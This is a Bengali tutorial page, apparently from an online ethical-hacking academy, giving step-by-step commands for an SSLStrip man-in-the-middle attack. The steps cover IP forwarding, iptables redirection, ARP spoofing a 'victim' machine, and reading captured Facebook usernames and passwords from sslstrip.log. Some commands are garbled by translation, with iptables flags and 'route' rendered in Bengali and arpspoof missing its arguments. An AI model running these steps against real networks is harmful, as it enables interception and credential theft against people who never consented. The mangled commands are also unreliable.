SSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণ

0 comment 114 views

SSLStrip-এর সাথে MITM আক্রমণ স্বচ্ছভাবে একটি নেটওয়ার্কে HTTP ট্র্যাফিক হাইজ্যাক করে, HTTPS লিঙ্কগুলি এবং পুনঃনির্দেশগুলি সন্ধান করে, তারপর সেই সংযোগগুলিকে অন্য একই রকম HTTP সংযোগ বা হোমোগ্রাফ-তুলনাযোগ্য HTTPS লিঙ্কগুলির সাথে সাদৃশ্যপূর্ণ করে৷

এটি একটি ফেভিকন সরবরাহ করার জন্য মোডগুলিকে সমর্থন করে যা দেখতে একটি লক আইকন, নির্বাচনী লগিং এবং সেশন অস্বীকারের মতো।

ধাপ 1: আমাদের মেশিনকে ফরওয়ার্ডিং মোডে সেট করা উচিত যাতে আমাদের মেশিনের প্রতিটি প্যাকেট ফরওয়ার্ড করার ক্ষমতা থাকে যা আপনার মেশিনের জন্য প্রত্যাশিত ছিল না।

echo 1 > /proc/sys/net/ipv4/ip_forward

ধাপ 2 : পোর্ট 80 থেকে পোর্ট 8080 এ ট্রাফিক রিডাইরেক্ট করতে iptables সেট করতে হবে যাতে sslstrip-এ বহির্গামী সংযোগ নিশ্চিত করা যায়।

iptables -t nat -A PREROUTING -p tcp -গন্তব্য-পোর্ট 80 -j রিডাইরেক্ট -টু-পোর্ট 8080

ধাপ3: আমাদের নেটওয়ার্ক গেটওয়ে খুঁজে বের করতে হবে।

পথ -n

 

SSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণ

ধাপ 4: পরবর্তী আমাদের লক্ষ্য মেশিনের আইপি ঠিকানা খুঁজে বের করতে হবে

SSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণ

ধাপ5:  ARP স্পুফিং হল এমন একটি কৌশল যার মাধ্যমে একজন আক্রমণকারী লোকাল এরিয়া নেটওয়ার্কে অ্যাড্রেস রেজোলিউশন প্রোটোকল (ARP) বার্তা পাঠায়।

arpspoof -i -t

SSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণ

ধাপ 6: এখন আমাদের একটি নতুন টার্মিনাল উইন্ডো খুলে পোর্ট 8080 শুনতে হবে।

sslstrip -l 8080

SSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণ

ধাপ 7: এখন আমাদের ভিকটিম মেশিনে যাওয়া উচিত এবং ব্রাউজারে এক্স টাইপ facebook.com এর জন্য কারণ আমরা জানি যে facebook HTTPS এর সাথে যাবে, কিন্তু এখন ভিকটিম মেশিন দিয়ে চেক করুন, আমরা HTTP এর মাধ্যমে কানেকশন দেখতে পাচ্ছি।

SSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণSSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণ

 

 

 

 

ধাপ 8: এখন হোম ফোল্ডারে যান এবং  sslstrip.log ফাইলটি পরীক্ষা করুন, আমরা লগইন করার জন্য প্রবেশ করা ব্যবহারকারীর নাম এবং পাসওয়ার্ড খুঁজে পেতে পারি।

SSLStrip এর সাথে HTTPS সংযোগের উপর MITM আক্রমণ

Related Posts

Leave a Comment

* By using this form you agree with the storage and handling of your data by this website.

সদাই একাডেমি
সদাই একাডেমি একটি অনলাইন ভিডিও শেখার প্ল্যাটফর্ম। এথিক্যাল হ্যাকিং, এসইও, ওয়েব ডেভেলপিং শিখুন

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy
error: checked
UA-200779953-1